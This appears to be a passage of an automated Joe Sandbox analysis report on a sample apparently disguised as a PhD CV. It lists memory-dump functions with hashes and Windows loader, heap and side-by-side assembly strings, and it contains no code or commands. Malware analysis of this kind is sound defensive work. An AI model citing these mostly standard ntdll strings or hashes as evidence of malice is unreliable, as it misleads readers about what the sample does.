                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                  • API String ID: 0-2368682639
                                                                                                  • Opcode ID: ad790964eea00e5badcdd5fe9171384d4664eb401f86a999e15f23b6112ecaba
                                                                                                  • Instruction ID: 73d696a74eb38b33985bd3a3d8f43593c6eedb4e52777f13eea655b37ce9f2d2
                                                                                                  • Opcode Fuzzy Hash: ad790964eea00e5badcdd5fe9171384d4664eb401f86a999e15f23b6112ecaba
                                                                                                  • Instruction Fuzzy Hash: 66819B71E41758AFDB20CF95C845BEEBBB5FB08B60F244019F804A7280C7B9AD46EB51
                                                                                                  Function 00F72919 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00FB22A2
                                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00FB221C
                                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00FB23F5
                                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 00FB2429
                                                                                                  • @, xrefs: 00FB23A5
                                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00FB242E
                                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00FB22CA
                                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00FB240C
                                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00FB20EE
                                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00FB2310
                                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00FB2213
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                  • API String ID: 0-4009184096
                                                                                                  • Opcode ID: 305b85dccdbd4d34f26b3a9265dd8fba731a5a7d5efdba6499eec6030da6deac
                                                                                                  • Instruction ID: e7c2ade0367e7570c9fb5ac8ec82910c69ee8efd307bdf3ef9f99a53a42809c4
                                                                                                  • Opcode Fuzzy Hash: 305b85dccdbd4d34f26b3a9265dd8fba731a5a7d5efdba6499eec6030da6deac
                                                                                                  • Instruction Fuzzy Hash: 99025EB2D042299BDB71DF14CC81BDAB7B8AB44314F4441DAE60DA7241DB34AF84EF5A
                                                                                                  Function 00FE86C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                  • API String ID: 0-2515994595
                                                                                                  • Opcode ID: 85c0a64044cf19a2a3cf777162a7b9c22eb7751c8c3e0493f83bc6d0d2c009a1
                                                                                                  • Instruction ID: 85f1c215bea16c3e1e3acb243cb0283280b408f898544cbf442bbdde8733a934
                                                                                                  • Opcode Fuzzy Hash: 85c0a64044cf19a2a3cf777162a7b9c22eb7751c8c3e0493f83bc6d0d2c009a1
                                                                                                  • Instruction Fuzzy Hash: 3051F0719083909BC324EF198C44BABB7E8FB843A0F54491DFDAD83191EB74DA45E792
                                                                                                  Function 00F5AC20 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                  • API String ID: 0-3197712848
                                                                                                  • Opcode ID: 79dd396073f254ec0b993d2127c404678d2080bc7d42aa0524c387cf5a00669f
                                                                                                  • Instruction ID: dbe4f90fee3b42550d725ca2498e5e1c4352025d8717886a9806d73373d9da9d
                                                                                                  • Opcode Fuzzy Hash: 79dd396073f254ec0b993d2127c404678d2080bc7d42aa0524c387cf5a00669f
                                                                                                  • Instruction Fuzzy Hash: BF12F3B1A083519FD720DF14C881BAAB7E4BF85715F04061EFE858B281E734DA59EB93
                                                                                                  Function 00FF0835 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                  • API String ID: 0-1357697941
                                                                                                  • Opcode ID: 2ae983a1b75febf1f6c13aedd2f96cf142806739c518c24814487273ba7b4417
                                                                                                  • Instruction ID: 9049d7e2cbf335a1bf04dd013f019267b89243e2e838e0f462193f1c0a993827
                                                                                                  • Opcode Fuzzy Hash: 2ae983a1b75febf1f6c13aedd2f96cf142806739c518c24814487273ba7b4417
                                                                                                  • Instruction Fuzzy Hash: 68F12631A00649EFCB25CF64C481BBAB7F5FF09724F048499E68597263DB34A945FB50
                                                                                                  Function 00FC8633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • VerifierFlags, xrefs: 00FC88D0
                                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 00FC86E7
                                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 00FC880F
                                                                                                  • VerifierDlls, xrefs: 00FC893D
                                                                                                  • VerifierDebug, xrefs: 00FC8925
                                                                                                  • HandleTraces, xrefs: 00FC890F
                                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 00FC86BD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                  • API String ID: 0-3223716464
                                                                                                  • Opcode ID: 47e109b80d237b59462cec72c8f34271ad5b138aba4c6a4d6725a904c39a6c65
                                                                                                  • Instruction ID: 3a6b79eb0bb323e3a2c2ae00513d1d98cb7f3242e7ec54045ea86b73373e38aa
                                                                                                  • Opcode Fuzzy Hash: 47e109b80d237b59462cec72c8f34271ad5b138aba4c6a4d6725a904c39a6c65
                                                                                                  • Instruction Fuzzy Hash: E8914872A04712AFD321DF548E83F26B798AB40B94F45441CF9806B691CB79DC06E792
                                                                                                  Function 00FC4A57 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • LdrpGenericExceptionFilter, xrefs: 00FC4A7C
                                                                                                  • LdrpProtectedCopyMemory, xrefs: 00FC4A74
                                                                                                  • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 00FC4AB8
                                                                                                  • Execute '.cxr %p' to dump context, xrefs: 00FC4B31
                                                                                                  • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 00FC4A75
                                                                                                  • minkernel\ntdll\ldrutil.c, xrefs: 00FC4A86
                                                                                                  • ***Exception thrown within loader***, xrefs: 00FC4AA7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                                  • API String ID: 0-2973941816
                                                                                                  • Opcode ID: 29c76cdca6ab372f0df7b7577f93c97f7242d073e3b50fa49bff625607ae72af
                                                                                                  • Instruction ID: 309aeba3c3aaf7d5596af77ca8972ec4b54eb7c39d2ea81546d58299e192b7cc
                                                                                                  • Opcode Fuzzy Hash: 29c76cdca6ab372f0df7b7577f93c97f7242d073e3b50fa49bff625607ae72af
                                                                                                  • Instruction Fuzzy Hash: E521BBBBA401127BD3289A6C9E67F367759FB81730F10051DF151D6181C51CFE01F615
                                                                                                  Function 00F4E9A0 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                  • API String ID: 0-1109411897
                                                                                                  • Opcode ID: 6c69fc83297e7be105dc15e44ee9f18e3046205fda2d065e7a4a75a8738da41f
                                                                                                  • Instruction ID: dff91f34aa0e80abac68867c8c4665420a9ff71298a8efa0ca0654dc1df9db58
                                                                                                  • Opcode Fuzzy Hash: 6c69fc83297e7be105dc15e44ee9f18e3046205fda2d065e7a4a75a8738da41f
                                                                                                  • Instruction Fuzzy Hash: 45A24D75E056298FDB64CF18CC887A9BBB1BF85314F2442E9D81DA7250DB74AE85EF00
                                                                                                  Function 00F7631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-792281065
                                                                                                  • Opcode ID: a0d77cc9a723eb1aa93fe8992a8ae2900da4641922ecaf77eaab6bad49bc4477
                                                                                                  • Instruction ID: e0e370a79e5142904a11c37448b21b8c281d116ade45854e1bc9307ff9aac0ba
                                                                                                  • Opcode Fuzzy Hash: a0d77cc9a723eb1aa93fe8992a8ae2900da4641922ecaf77eaab6bad49bc4477
                                                                                                  • Instruction Fuzzy Hash: 45917A31E00710EBDB35EF14DD46BE977A4BB40720F14402AE545AB2C2D779AC01FB92
                                                                                                  Function 00F72C10 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 00FB2579
                                                                                                  • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 00FB2510
                                                                                                  • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 00FB25A6
                                                                                                  • @, xrefs: 00F72D6D
                                                                                                  • .Local\, xrefs: 00F72CB1
                                                                                                  • \WinSxS\, xrefs: 00F72D43
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                                                  • API String ID: 0-3926108909
                                                                                                  • Opcode ID: 8f2f86856d753bf290a5d2a39ad7603098d9b601b028e1d6801f6a670d6365a9
                                                                                                  • Instruction ID: 3560b12a91c0684e61909d079c13191e110be8abe1bf764ff3729ae70d938a42
                                                                                                  • Opcode Fuzzy Hash: 8f2f86856d753bf290a5d2a39ad7603098d9b601b028e1d6801f6a670d6365a9
                                                                                                  • Instruction Fuzzy Hash: 6D81E0716043419FC762CF15C880AABB7E8FF95720F14896EF8989B242D774D944EBA3
                                                                                                  Function 00F3640D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 00F99790
                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00F997B9
                                                                                                  • LdrpInitShimEngine, xrefs: 00F99783, 00F99796, 00F997BF
                                                                                                  • apphelp.dll, xrefs: 00F36446
                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00F9977C
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00F997A0, 00F997C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-204845295
                                                                                                  • Opcode ID: 7019c5072f8b260288cc66ec1f78831efd0106dd064bef3a46bb0b497457f005
                                                                                                  • Instruction ID: beb537da0e6c2fc673655d3f546f04863fc2e19f25008ef15b405b5d18d4e515
                                                                                                  • Opcode Fuzzy Hash: 7019c5072f8b260288cc66ec1f78831efd0106dd064bef3a46bb0b497457f005
                                                                                                  • Instruction Fuzzy Hash: B151CF71608300ABE721DF24DC82BAB77E8FB84754F10491DF9959B1A1DA78D904EB93
                                                                                                  Function 00F7C5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 00FB7FF0
                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 00FB7F7B
                                                                                                  • LdrpInitializeProcess, xrefs: 00F7C5E4
                                                                                                  • LdrpInitializeImportRedirection, xrefs: 00FB7F82, 00FB7FF6
                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 00FB7F8C, 00FB8000
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00F7C5E3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                  • API String ID: 0-475462383
                                                                                                  • Opcode ID: 221d48e59d34139d7097a40620a4a526d5189f7f09539a28aa9dc31875ff326d
                                                                                                  • Instruction ID: 98adcfcef3c361d9af605fc7bcbb6c70cadd2ccb178592456fdf04e0f1eae05c
                                                                                                  • Opcode Fuzzy Hash: 221d48e59d34139d7097a40620a4a526d5189f7f09539a28aa9dc31875ff326d
                                                                                                  • Instruction Fuzzy Hash: 9C3107716043429FC224FF28DC47E6AB794EFC4B60F044558F884AB292DA28EC04EBD3
                                                                                                  Function 00F72594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00FB1FC9
                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00FB1FA9
                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 00FB1F6A, 00FB1FA4, 00FB1FC4
                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00FB1F8A
                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 00FB1F6F
                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00FB1F82
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                  • API String ID: 0-861424205
                                                                                                  • Opcode ID: 21d42540e9a7df8f7df812e5d0e03d9fd75cdc73d9ec71697bab08197d72905f
                                                                                                  • Instruction ID: 97bc8e27dbb4ddf315fae4cb1a1b6998dff60ab2f78309c67be88e759e59b571
                                                                                                  • Opcode Fuzzy Hash: 21d42540e9a7df8f7df812e5d0e03d9fd75cdc73d9ec71697bab08197d72905f
                                                                                                  • Instruction Fuzzy Hash: F331EA76F00325BBE7209A879C56FAB7668EB50B50F15415AF90477285D370EE00FBE2
                                                                                                  Function 00FC4BC0 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                  • API String ID: 0-2518169356
                                                                                                  • Opcode ID: b15f9800af1547bc8e28083a21ce4b3972f2b69a3c65109499f9c8dbfc97523b
                                                                                                  • Instruction ID: 828e41668b4e454a5af3796266ef34b01bf0ae1724ec8b412c509ca345b4fc96
                                                                                                  • Opcode Fuzzy Hash: b15f9800af1547bc8e28083a21ce4b3972f2b69a3c65109499f9c8dbfc97523b
                                                                                                  • Instruction Fuzzy Hash: 9791C272E0161A8BCB24DF58C992BAEB7B1FF48320F594169E811E7360D735ED01EB90
                                                                                                  Function 00F4A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                  • API String ID: 0-379654539
                                                                                                  • Opcode ID: 054cb77501cb597a6696412773f6d3394d53fded36ab50b48c1878bcc2caa2ab
                                                                                                  • Instruction ID: 0e470825efe95bbdf460a9e5b251e4d97d7166d48ed34aaf2c27a5f58798718b
                                                                                                  • Opcode Fuzzy Hash: 054cb77501cb597a6696412773f6d3394d53fded36ab50b48c1878bcc2caa2ab
                                                                                                  • Instruction Fuzzy Hash: DDC1AD75648382CFD721CF58C540B6ABBE4BF85714F04886AFC868B261E378C945EB53
                                                                                                  Function 00F78322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • @, xrefs: 00F784B1
                                                                                                  • LdrpInitializeProcess, xrefs: 00F78342
                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00F7847E
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00F78341
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-1918872054
                                                                                                  • Opcode ID: ae255bd2638654506a4037c3158b51941ef6f82825c6aa84f4d1a99c8095ed9d
                                                                                                  • Instruction ID: 7729ce94da918e79191cc87918b278c9a59e380439fea0ebaa5a66a4fe29bc27
                                                                                                  • Opcode Fuzzy Hash: ae255bd2638654506a4037c3158b51941ef6f82825c6aa84f4d1a99c8095ed9d
                                                                                                  • Instruction Fuzzy Hash: 2091AD71548341AED721EE21CC45FABBBECBF84794F00482EF68892141E778E945EB63
                                                                                                  Function 00F50B10 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00FA52FA
                                                                                                  • HEAP[%wZ]: , xrefs: 00FA52DE, 00FA539F
                                                                                                  • HEAP: , xrefs: 00FA52ED, 00FA53AE
                                                                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00FA53BB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                  • API String ID: 0-1657114761
                                                                                                  • Opcode ID: 1901cb967bbb1c1098764c1dc5b62baee68190e87ba5e024ba5d7befb0664752
                                                                                                  • Instruction ID: c4622b11c8fac4d2c746fc0c0877ffa3abb8c41f90f647b8a4a93256c03d6180
                                                                                                  • Opcode Fuzzy Hash: 1901cb967bbb1c1098764c1dc5b62baee68190e87ba5e024ba5d7befb0664752
                                                                                                  • Instruction Fuzzy Hash: 12A14630A006469BDB24CF24C890BBAB7F1FF51315F14856DEA86CB681DB34E948E791
                                                                                                  Function 00F7265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00FB1FE3, 00FB20BB
                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00FB20C0
                                                                                                  • .Local, xrefs: 00F727F8
                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 00FB1FE8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                  • API String ID: 0-1239276146
                                                                                                  • Opcode ID: 5c2ec35c9797045496b3cfa877a82faa0528d0db845cce0bb576a4e304d508dd
                                                                                                  • Instruction ID: 93d8d1514dbcbf939b67fcbdd00c0f26ae514b226318e280e1d65f625693aac8
                                                                                                  • Opcode Fuzzy Hash: 5c2ec35c9797045496b3cfa877a82faa0528d0db845cce0bb576a4e304d508dd
